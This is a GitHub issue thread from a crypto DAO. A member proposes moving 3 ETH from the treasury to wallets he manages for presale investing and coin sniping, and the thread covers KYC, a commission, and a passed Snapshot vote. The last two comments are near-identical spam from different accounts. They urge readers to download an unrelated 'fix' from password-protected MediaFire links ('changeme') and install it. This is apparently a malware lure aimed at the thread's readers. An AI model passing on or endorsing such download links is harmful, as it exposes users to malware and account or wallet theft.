### ISSUE TITLE
Treasury - Allocate 3 ETH from the treasury to a separate wallets to participate in micro to low cap private sales.

### ISSUE THREAD

**Issue by AsgaaardFjord** [aggregatedfinance/agfi-dao#20]
### Allocate 3 ETH from the treasury to a separate wallets to participate in micro to low cap private sales.

2 ETH will be requested for the mainnet, 1 ETH on arbitrum.

Who is going to manage the wallet?
I will do it and doxxing myself the same way as Ed did.

Why not Ed?
Reward to time consumption would mean Ed has less time to focus on our bigger positions for the treasury.

What experience do you have and why should we trust you?
I have been with Agfi for the past 12 months, acting mostly as the lead mod and helping out behind scenes with different things, all on an unpaid basis. Being also a loyal holder of decent amount of agfi tokens, it is in my best interest to bring this project to the next level.
Furthermore, I have been focusing the past months on the arbitrum L2, and made good connections with devs and other reputable players, which got myself into a chunk of private sales already.

What are the benefits?
Private spots are given out to random users. Being a DAO with a community behind it, giving a spot to Agfi gives more exposure to the projects and vice-versa. Being in this position I can negotiate better deals.
Being in contact with the owner, i can sell our lock liquidity product and/or negotiate different partnership

What are the risks?
Even with best research, projects can still rug or scam. Protocols/contacts can be buggy.

What are the costs?
Presale-price and gas fees. I will do it for free in the beginning, but with future success I want to propose a 30% commission on profits after surpassing 3 ETH in profits.

What happens with the profits?
30% of the gains will be used to benefit the agfi tokenholders, either in form of buybacks or ETH rewards. The remaining 70% will either be staying in the wallet to use for further presales or if they stay unused they will be send back to the treasury.
Update: a community member will donate a high value nft (consortium) with access to different bots, one being like a manual sniper. Since we haven't clarified on what to do exactly with the profits, I raise the added feature of using some of the profits to get us into the positions of sniping shitcoins, once i make myself with it.

Will this be a trading wallet?
The main idea remains: one single entry and a few exits, but no re-entry on dips. The entry positions will be the presale exit strategy is flexible. I usually go with selling 50% after a 4x, meaning doubling my initial buy-in
However if good opportunities arise from the sniping bot, I will try invest into fairlaunches for a quick flip from the presale profits

Proposal will transfer 3 ETH from 0x3e822d55e79eA9F53C744BD9179d89dDec081556 to
0x2c9ff86e33ab4828a67a94fe18941dd58a06b405. 0.5 ETH will be withdrawn from Ed's trading fund.

Funds may be also moved to 0x0239b6028A57A7695cB3293b052fD43495a2f94F for risk management

**Comment by cl-tim** [comment]
Just 3 things:
1. Could you please specify the wallet address that will receive the funds? Ideally a fresh address that hasn't been used before so it's easier to track.
2. For KYC, just use [my.signata.net](https://my.signata.net) and go through the KYC process there. It doesn't have to be the same wallet that receives the funds.
3. For commission, can we also specify a target? Like if you make x, then the commissions will start? Better to codify that up-front so there's a target to aim for.

**Comment by AsgaaardFjord** [comment]
1. 0x2c9ff86e33ab4828a67a94fe18941dd58a06b405
I'll add a second wallet, in case I need so connect to a Dapp, so it wont compromise the main wallet
0x0239b6028A57A7695cB3293b052fD43495a2f94F
2. Done
3. I propose 30%, beginning at the point where I surpass 3 ETH in profit.

**Comment by cl-tim** [comment]
Proposal has been opened on Snapshot for voting: https://snapshot.org/#/aggregatedfinance.eth/proposal/0xf78671c4265e3dca05c66da8c9628c74e7860b3fb0c35b4fdc61b9d707b0b10b

**Comment by Cryptobuzz1** [comment]
Result Successful.

Action:-@Agfi Official to transfer 3 ETH to 0x2c9ff86e33ab4828a67a94fe18941dd58a06b405 & ( 0x0239b6028A57A7695cB3293b052fD43495a2f94F) 

Vote recap here:-
https://snapshot.org/#/aggregatedfinance.eth/proposal/0xf78671c4265e3dca05c66da8c9628c74e7860b3fb0c35b4fdc61b9d707b0b10b

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
